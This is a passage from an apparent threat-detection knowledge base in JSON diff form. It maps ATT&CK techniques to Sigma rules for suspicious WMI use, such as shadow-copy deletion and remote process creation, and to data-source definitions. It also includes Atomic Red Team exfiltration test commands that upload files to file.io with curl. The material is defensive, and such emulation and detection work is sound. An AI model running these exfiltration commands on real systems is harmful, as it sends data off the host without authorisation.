+ "1B1A3F43BF37B5BFE60751F2EE2F326E", + "37777A96245A3C74EB217308F3546F4C", + "9D87C9D67CE724033C0B40CC4CA1B206" + ], + "CommandLine": [ + "* *format:\\\"http*", + "* /format:'http", + "* /format:http*" + ] + }, + "condition": "1 of them" + } + }, + { + "title": "Suspicious WMI execution", + "id": "526be59f-a573-4eea-b5f7-f0973207634d", + "status": "experimental", + "description": "Detects WMI executing suspicious commands", + "references": [ + "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", + "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", + "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/" + ], + "author": "Michael Haag, Florian Roth, juju4", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\wmic.exe" + ], + "CommandLine": [ + "*/NODE:*process call create *", + "* path AntiVirusProduct get *", + "* path FirewallProduct get *", + "* shadowcopy delete *" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "car.2016-03-002" + ], + "falsepositives": [ + "Will need to be tuned", + "If using Splunk, I recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine." + ], + "level": "medium" + }, + { + "title": "Login with WMI", + "id": "5af54681-df95-4c26-854f-2565e13cfab0", + "status": "stable", + "description": "Detection of logins performed with WMI", + "author": "Thomas Patzke", + "tags": [ + "attack.execution", + "attack.t1047" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4624, + "ProcessName": "*\\WmiPrvSE.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Monitoring tools", + "Legitimate system administration" + ], + "level": "low" + }, + { + "title": "WMI Persistence", + "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "status": "experimental", + "description": "Detects suspicious WMI event filter and command line event consumer based on event id 5861 and 5859 (Windows 10, 2012 and higher)", + "author": "Florian Roth", + "references": [ + "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1047" + ], + "logsource": { + "product": "windows", + "service": "wmi" + }, + "detection": { + "selection": { + "EventID": 5861 + }, + "keywords": { + "Message": [ + "*ActiveScriptEventConsumer*", + "*CommandLineEventConsumer*", + "*CommandLineTemplate*" + ] + }, + "selection2": { + "EventID": 5859 + }, + "condition": "selection and 1 of keywords or selection2" + }, + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "medium" + }, + { + "title": "WMI Persistence - Script Event Consumer", + "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "status": "experimental", + "description": "Detects WMI script event consumers", + "references": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/" + ], + "author": "Thomas Patzke", + "date": "2018/03/07", + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1047" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "C:\\WINDOWS\\system32\\wbem\\scrcons.exe", + "ParentImage": "C:\\Windows\\System32\\svchost.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate event consumers" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://securelist.com/muddywater/88059/", + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1048.002", + "command_list": [ + "#{curl_path} -F 'file=@PathToAtomicsFolder/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n", + "C:\\Windows\\System32\\Curl.exe -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n", + "curl -F 'file=@PathToAtomicsFolder/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/" + ], + "commands": [ + { + "command": "#{curl_path} -F 'file=@PathToAtomicsFolder/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n", + "source": "atomics/T1048.002/T1048.002.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" + }, + { + "command": "C:\\Windows\\System32\\Curl.exe -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n", + "source": "atomics/T1048.002/T1048.002.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" + }, + { + "command": "curl -F 'file=@PathToAtomicsFolder/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/", + "source": "atomics/T1048.002/T1048.002.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1048.002", + "display_name": "Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol", + "atomic_tests": [ + { + "name": "Exfiltrate data HTTPS using curl windows", + "auto_generated_guid": "1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0", + "description": "Exfiltrate data HTTPS using curl to file share site file.io\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Test file to upload", + "type": "Path", + "default": "PathToAtomicsFolder/T1048.002/src/artifact" + }, + "curl_path": { + "description": "path to curl.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\Curl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Curl must be installed on system.\n", + "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\" -Outfile $env:temp\\curl.zip\nExpand-Archive -Path $env:temp\\curl.zip -DestinationPath $env:temp\\curl\nCopy-Item $env:temp\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe C:\\Windows\\System32\\Curl.exe\nRemove-Item $env:temp\\curl\nRemove-Item $env:temp\\curl.zip\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "#{curl_path} -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n" + } + }, + { + "name": "Exfiltrate data HTTPS using curl linux", + "auto_generated_guid": "4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01", + "description": "Exfiltrate data HTTPS using curl to file share site file.io\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "input_file": { + "description": "Test file to upload", + "type": "Path", + "default": "PathToAtomicsFolder/T1048.002/src/artifact" + } + }, + "executor": { + "name": "bash", + "elevation_required": false, + "command": "curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ 